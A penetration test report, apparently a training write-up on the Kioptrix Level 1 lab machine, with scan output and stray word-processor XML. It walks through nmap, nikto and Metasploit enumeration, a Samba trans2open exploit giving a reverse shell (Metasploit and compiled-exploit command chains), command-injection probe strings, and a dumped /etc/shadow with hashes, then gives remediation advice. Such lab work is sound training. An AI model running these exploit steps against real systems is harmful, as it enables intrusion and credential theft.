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62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Penetration Test Report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Machine: Kioptrix Level 1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Written By: Lakshy Sharma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Index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Scanning  and Information Gathering.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Knowing our machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)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Enumeration.</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Researching vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)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Exploitation.</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Gaining access to machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)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Findings.</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Reporting what we found.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)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Conclusion.</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Reporting status of machine.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)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Course of Action Plan.</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>How to fix system.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>)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Scanning and Information Gathering.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1. Important Observations.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Server not hidden from other machines on LAN network.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Lost of outdated software being used.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Apache outdated. Used – 1.3.2, Current – 2.4.37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OpenSSL outdated. Used – 0.9.6b, Current – 1.1.1.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Test pages left open for general public.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This particular nikto finding shows a php backdoor is present in the machine which can be prove to be really worrying.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/wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A PHP backdoor file manager was found.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Something more critical that we can see here, looks like a bash backdoor is present.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/shell?cat+/etc/hosts: A backdoor was identified.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This could mean the machine is already under attack!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u w:val="none"/>
        </w:rPr>
        <w:t>///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.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Overall speaking the server seems to be overflowing with vulnerabilities.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2. Scanning results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>Nmap Scan results.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$ nmap -sV -p- 10.10.10.3                                                                                      1 ⨯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Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 09:18 EDT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Nmap scan report for 10.10.10.3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Host is up (0.0020s latency).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Not shown: 65529 closed ports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PORT      STATE SERVICE     VERSION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22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)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80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 </w:t>
        <w:tab/>
        <w:t>OpenSSL/0.9.6b)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111/tcp   open  rpcbind     2 (RPC #100000)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139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)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443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 </w:t>
        <w:tab/>
        <w:t>OpenSSL/0.9.6b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32768/tcp open  status      1 (RPC #100024)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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ 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Nmap done: 1 IP address (1 host up) scanned in 25.19 seconds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>Dirb Scan results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$ dirb http://10.10.10.3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-----------------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DIRB v2.22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By The Dark Raver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-----------------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START_TIME: Wed May  5 09:43:51 2021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URL_BASE: http://10.10.10.3/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WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt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-----------------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GENERATED WORDS: 4612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---- Scanning URL: http://10.10.10.3/ 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http://10.10.10.3/~operator (CODE:403|SIZE:273)        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http://10.10.10.3/~root (CODE:403|SIZE:269)            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http://10.10.10.3/cgi-bin/ (CODE:403|SIZE:272)         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http://10.10.10.3/index.html (CODE:200|SIZE:2890)      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==&gt; DIRECTORY: http://10.10.10.3/manual/                 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==&gt; DIRECTORY: http://10.10.10.3/mrtg/                   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==&gt; DIRECTORY: http://10.10.10.3/usage/                  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---- Entering directory: http://10.10.10.3/manual/ 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(!) WARNING: Directory IS LISTABLE. No need to scan it.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    (Use mode '-w' if you want to scan it anyway)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---- Entering directory: http://10.10.10.3/mrtg/ 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http://10.10.10.3/mrtg/index.html (CODE:200|SIZE:17318)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---- Entering directory: http://10.10.10.3/usage/ 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http://10.10.10.3/usage/index.html (CODE:200|SIZE:5413)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-----------------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END_TIME: Wed May  5 09:43:59 2021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DOWNLOADED: 13836 - FOUND: 6                             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3. Information Gathering Observations.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u w:val="none"/>
        </w:rPr>
        <w:t>From nmap we learn that website has http ports open so I went on the website and I found a test page that shows the computer uses a red hat linux.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25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u w:val="none"/>
        </w:rPr>
        <w:t>2.  The URL 10.10.10.3/cgi-bin throws a 404 error and leaks critical information of outdated software being used.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6120130" cy="803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32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Enumeration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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs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1. Automated Enumeration Scan Results.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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs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none"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nikto Scan results.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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs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- Nikto v2.1.6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---------------------------------------------------------------------------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Target IP:          10.10.10.3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Target Hostname:    10.10.10.3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Target Port:        80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Start Time:         2021-05-05 09:25:46 (GMT-4)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---------------------------------------------------------------------------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Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b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Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, </w:t>
        <w:tab/>
        <w:t xml:space="preserve">mtime: Wed </w:t>
        <w:tab/>
        <w:t>Sep  5 23:12:46 2001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The anti-clickjacking X-Frame-Options header is not present.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The X-XSS-Protection header is not defined. This header can hint to the user agent to </w:t>
        <w:tab/>
        <w:t xml:space="preserve">protect against </w:t>
        <w:tab/>
        <w:t>some forms of XSS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The X-Content-Type-Options header is not set. This could allow the user agent to render </w:t>
        <w:tab/>
        <w:t xml:space="preserve">the </w:t>
        <w:tab/>
        <w:t>content of the site in a different fashion to the MIME type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mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server </w:t>
        <w:tab/>
        <w:t>version)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OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and </w:t>
        <w:tab/>
        <w:t xml:space="preserve">0.9.8zc </w:t>
        <w:tab/>
        <w:t>are also current.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Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is </w:t>
        <w:tab/>
        <w:t xml:space="preserve">the </w:t>
        <w:tab/>
        <w:t>EOL for the 2.x branch.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OSVDB-27487: Apache is vulnerable to XSS via the Expect header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Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE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OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST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OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and </w:t>
        <w:tab/>
        <w:t>possible code execution. CAN-2002-0392.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OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer </w:t>
        <w:tab/>
        <w:t>overflow which allows attackers to kill any process on the system. CAN-2002-0839.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OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in </w:t>
        <w:tab/>
        <w:t>mod_rewrite and mod_cgi. CAN-2003-0542.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mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which </w:t>
        <w:tab/>
        <w:t xml:space="preserve">may </w:t>
        <w:tab/>
        <w:t xml:space="preserve">allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, </w:t>
        <w:tab/>
        <w:t>OSVDB-756.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///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the </w:t>
        <w:tab/>
        <w:t>URL.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OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable </w:t>
        <w:tab/>
        <w:t xml:space="preserve">to </w:t>
        <w:tab/>
        <w:t>Cross Site Scripting (XSS).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OSVDB-3268: /manual/: Directory indexing found.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OSVDB-3092: /manual/: Web server manual found.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OSVDB-3268: /icons/: Directory indexing found.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OSVDB-3233: /icons/README: Apache default file found.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OSVDB-3092: /test.php: This might be interesting...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/wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP </w:t>
        <w:tab/>
        <w:t>backdoor file manager was found.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/wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: </w:t>
        <w:tab/>
        <w:t xml:space="preserve">A PHP </w:t>
        <w:tab/>
        <w:t>backdoor file manager was found.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/wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file </w:t>
        <w:tab/>
        <w:t>manager was found.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/wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP </w:t>
        <w:tab/>
        <w:t xml:space="preserve">backdoor file </w:t>
        <w:tab/>
        <w:t>manager was found.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/wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor </w:t>
        <w:tab/>
        <w:t xml:space="preserve">file </w:t>
        <w:tab/>
        <w:t>manager was found.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/wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP </w:t>
        <w:tab/>
        <w:t>backdoor file manager was found.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/assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.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 xml:space="preserve">+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command </w:t>
        <w:tab/>
        <w:t>execution.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/shell?cat+/etc/hosts: A backdoor was identified.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+ 8672 requests: 0 error(s) and 30 item(s) reported on remote host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End Time:           2021-05-05 09:26:06 (GMT-4) (20 seconds)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---------------------------------------------------------------------------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+ 1 host(s) tested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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs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none"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nessus Scan Results.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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs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u w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t>The nessus scan results have been attached with this report.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2. Manual Enumeration Results.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u w:val="none"/>
        </w:rPr>
        <w:t>Using exploit database I found various exploits for the vulnerabilities discovered in scanning and automated enumeration.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u w:val="none"/>
        </w:rPr>
        <w:t>Below is an exploit for outdated Apache.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85725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>152400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5603875" cy="3684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Using Metasploit I found an auxiliary module that can be used to find what version of samba file-share is being used. This is done to check if I can exploit samba services.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Metasploit Scan Output -  Samba version 2.2.1a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First I searched for a smb scanner in metasploit.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Then I entered auxiliary scan and set the remote host as my target machine 10.10.10.3.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The output gives the results of samba being used, now I can find exploits.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msf6 &gt; search smb scanner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Matching Modules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================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#   Name                                                            Disclosure Date  Rank    Check  Description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-   ----                                                            ---------------  ----    -----  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0   auxiliary/scanner/http/citrix_dir_traversal                     2019-12-17       normal  No     Citrix ADC (NetScaler) Directory Traversal Scanner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1   auxiliary/scanner/smb/impacket/dcomexec                         2018-03-19       normal  No     DCOM Exec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2   auxiliary/scanner/smb/impacket/secretsdump                                       normal  No     DCOM Exec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3   auxiliary/scanner/smb/smb_ms17_010                                               normal  No     MS17-010 SMB RCE Detection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4   auxiliary/scanner/smb/psexec_loggedin_users                                      normal  No     Microsoft Windows Authenticated Logged In Users Enumeration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5   auxiliary/scanner/sap/sap_smb_relay                                              normal  No     SAP SMB Relay Abuse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6   auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing                     normal  No     SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure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7   auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence                   normal  No     SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check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8   auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir                                  normal  No     SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing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9   auxiliary/scanner/smb/smb_enumusers_domain                                       normal  No     SMB Domain User Enumeration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10  auxiliary/scanner/smb/smb_enum_gpp                                               normal  No     SMB Group Policy Preference Saved Passwords Enumeration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11  auxiliary/scanner/smb/smb_login                                                  normal  No     SMB Login Check Scanner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12  auxiliary/scanner/smb/smb_lookupsid                                              normal  No     SMB SID User Enumeration (LookupSid)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13  auxiliary/admin/smb/check_dir_file                                               normal  No     SMB Scanner Check File/Directory Utility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14  auxiliary/scanner/smb/pipe_auditor                                               normal  No     SMB Session Pipe Auditor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15  auxiliary/scanner/smb/pipe_dcerpc_auditor                                        normal  No     SMB Session Pipe DCERPC Auditor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16  auxiliary/scanner/smb/smb_enumshares                                             normal  No     SMB Share Enumeration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17  auxiliary/scanner/smb/smb_enumusers                                              normal  No     SMB User Enumeration (SAM EnumUsers)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18  auxiliary/scanner/smb/smb_version                                                normal  No     SMB Version Detection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19  auxiliary/scanner/snmp/snmp_enumshares                                           normal  No     SNMP Windows SMB Share Enumeration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20  auxiliary/scanner/smb/smb_uninit_cred                                            normal  Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State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21  auxiliary/scanner/smb/impacket/wmiexec                          2018-03-19       normal  No     WMI Exec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Interact with a module by name or index. For example info 21, use 21 or use auxiliary/scanner/smb/impacket/wmiexec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msf6 &gt; use 18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msf6 auxiliary(scanner/smb/smb_version) &gt; info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>Name: SMB Version Detection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Module: auxiliary/scanner/smb/smb_version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License: Metasploit Framework License (BSD)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>Rank: Normal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Provided by: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hdm &lt;x@hdm.io&gt;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Spencer McIntyre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Christophe De La Fuente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Check supported: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Basic options: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     Current Setting  Required  Description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----     ---------------  --------  -----------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RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'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THREADS  1                yes       The number of concurrent threads (max one per host)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Fingerprint and display version information about SMB servers.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Protocol information and host operating system (if available) will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be reported. Host operating system detection requires the remote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server to support version 1 of the SMB protocol. Compression and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encryption capability negotiation is only present in version 3.1.1.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msf6 auxiliary(scanner/smb/smb_version) &gt; set RHOSTS 10.10.10.3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RHOSTS =&gt; 10.10.10.3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msf6 auxiliary(scanner/smb/smb_version) &gt; run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[*] 10.10.10.3:139        - SMB Detected (versions:) (preferred dialect:) (signatures:optional)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[*] 10.10.10.3:139        -   Host could not be identified: Unix (Samba 2.2.1a)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[*] 10.10.10.3:           - Scanned 1 of 1 hosts (100% complete)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[*] Auxiliary module execution completed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</w:rPr>
        <w:t xml:space="preserve">Exploits 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en-GB" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>based on detected samba version.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Exploit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161925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5581650" cy="3663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Exploit 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123190</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5122545" cy="3368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  <w:t>Some more exploits we can use.</w:t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334125" cy="64782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Exploitation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Automated Exploit.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 started metasploit console and followed these command to get a reverse shell.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commands used are.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msfconsole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search trans2open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use 1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set RHOSTS 10.10.10.3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set LHOST 10.10.10.4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set payload linux/x86/shell_reverse_tcp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info (To check all information.)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After pressing enter button with last command I successfully entered a reverse shell with my victim sysem.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Manual Exploit.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chain of commands to use is.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Use the searchsploit command to explore exploit database and find a samba vulnerability using following command.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searchsploit samba.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Extract the exploit in current directory using following command.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searchsploit -m unix/remote/22469.c.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Compile the exploit using gcc in following command.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gcc -o exploit 22469.c.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To find the options available use this command.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./exploit.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To target our victim machine use this command.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./exploit -t 10.10.10.3.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Once the attack is complete you must gain a reverse shell into the victim machine.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Use the command ‘whoami’ to check which user you are currently I hope you have gained root privilege into target machine.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Findings.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Once I got my reverse shell I ran these commands and the output is given below.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whoami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root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dead.letter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mbox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cat mbox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From root  Sat Sep 26 11:42:10 2009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Return-Path: &lt;root@kioptix.level1&gt;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Received: (from root@localhost)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by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831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root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400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Date: Sat, 26 Sep 2009 11:42:10 -0400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From: root &lt;root@kioptix.level1&gt;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Message-Id: &lt;200909261542.n8QFgAZ01831@kioptix.level1&gt;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To: root@kioptix.level1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Subject: About Level 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Status: RO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If you are reading this, you got root. Congratulations.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Level 2 won't be as easy...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cat /etc/shadow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root:$1$bb7mJB5u$8/xu63rH8Fm8bsAS7iAsv1:18421:0:99999:7:::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bin:*:14513:0:99999:7:::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daemon:*:14513:0:99999:7:::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adm:*:14513:0:99999:7:::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lp:*:14513:0:99999:7:::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sync:*:14513:0:99999:7:::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shutdown:*:14513:0:99999:7:::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halt:*:14513:0:99999:7:::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mail:*:14513:0:99999:7:::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news:*:14513:0:99999:7:::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uucp:*:14513:0:99999:7:::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operator:*:14513:0:99999:7:::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games:*:14513:0:99999:7:::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gopher:*:14513:0:99999:7:::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ftp:*:14513:0:99999:7:::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nobody:*:14513:0:99999:7:::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mailnull:!!:14513:0:99999:7:::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rpm:!!:14513:0:99999:7:::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xfs:!!:14513:0:99999:7:::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rpc:!!:14513:0:99999:7:::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rpcuser:!!:14513:0:99999:7:::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nfsnobody:!!:14513:0:99999:7:::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nscd:!!:14513:0:99999:7:::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ident:!!:14513:0:99999:7:::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radvd:!!:14513:0:99999:7:::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postgres:!!:14513:0:99999:7:::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apache:!!:14513:0:99999:7:::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squid:!!:14513:0:99999:7:::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pcap:!!:14513:0:99999:7:::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john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::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harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::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Congratulations you have been hacked.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Note – As a measure of ease of access I have changed the root password but this is not recommended in a professional setup.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Conclusion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</w:rPr>
        <w:t>Findings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Kioptrix Level 1 is a machine that is fully ridden with various vulnerabilities and should not be allowed to run as a server in any kind of professional setup.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Apart from simple samba vulnerability that gave us root access to the whole system, it has 2 backdoors present in php and bash.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It runs pretty outdated version of linux and apache-server and is not fit for commercial deployment.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Suggestions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If hardware is still supported then please follow course of action plan to fixing the vulnerabilities.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If hardware is not supported then it is advisable to leave this machine and try some latest hardware.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Course of Action Plan.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Run a hardware scan and check if hardware is supported by latest Linux distribution.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Run a full distro upgrade if possible if not create a new live usb with latest linux distribution and perform a complete reinstall of OS.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After reinstallation setup apache-server and make sure no error pages are out in public domain.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Make sure A firewall is installed and active.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Setup tripwire for system.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Setup network subnets and shift your server onto a different LAN to make attacking it harder.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Setup server such that it only allows necessary ports.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Use network firewalls so that scans like nikto and nessus get picked up and the hosts are temporarily banned.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Remember to close extra ports and use a commercial security checkup software like lynis to detect vulnerabilities and patch them actively.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Make sure the router can block DoS attacks so the server itself does not have to deal with it.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Make use of honey pots in the network and try to analyse your attacker’s motives and techniques.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="659" w:right="541" w:header="0" w:top="1163" w:footer="0" w:bottom="1163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LibreOffice/6.4.7.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>16</Pages>
  <Words>2071</Words>
  <Characters>13924</Characters>
  <CharactersWithSpaces>18552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2021-05-05T18:44:29Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-GB</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-06T11:46:12Z</dcterms:modified>
  <cp:revision>66</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>